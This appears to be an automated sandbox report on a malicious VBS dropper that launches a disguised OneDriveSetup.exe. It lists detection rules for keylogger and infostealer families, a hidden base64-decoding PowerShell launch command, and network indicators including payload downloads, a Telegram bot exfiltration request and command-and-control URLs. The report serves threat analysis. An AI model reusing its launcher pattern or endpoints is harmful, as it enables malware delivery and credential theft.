                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2027/11/2024%20/%2008:13:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /gfy/gesr.txt HTTP/1.1Host: sbv.pushswroller.euConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /swsk/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: sws.swpushroller.euContent-Length: 1432Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.84.67:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49715 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49714 -> 172.67.177.134:443
                  Source: global trafficHTTP traffic detected: GET /d/MQJcS HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /d/MQJcS HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.8:49713 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /d/MQJcS HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2027/11/2024%20/%2008:13:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /d/MQJcS HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /gfy/gesr.txt HTTP/1.1Host: sbv.pushswroller.euConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: paste.ee
                  Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
                  Source: global trafficDNS traffic detected: DNS query: sbv.pushswroller.eu
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: sws.swpushroller.eu
                  Source: unknownHTTP traffic detected: POST /swsk/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: sws.swpushroller.euContent-Length: 1432Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 26 Nov 2024 08:33:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: wscript.exe, 00000000.00000003.1460347182.000002BB95151000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463456856.000002BB93885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/MQJcS
                  Source: wscript.exe, 00000000.00000003.1462205544.000002BB956B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/MQJcSW
                  Source: wscript.exe, 00000000.00000002.1463009577.000002BB936B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461792531.000002BB936B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/MQJcS_
                  Source: powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.1993680537.000002380385E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sws.swpushroller.eu
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sws.swpushroller.eu/swsk/P4.php

                  System Summary

                  Source: 6.2.OneDriveSetup.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7928, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8064, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
                  Source: C:\Windows\System32\wscript.exe COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe Code function: String function: 0040E1D8 appears 44 times
                  Source: Doc261124.vbs Initial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2466
Source: 6.2.OneDriveSetup.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.OneDriveSetup.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
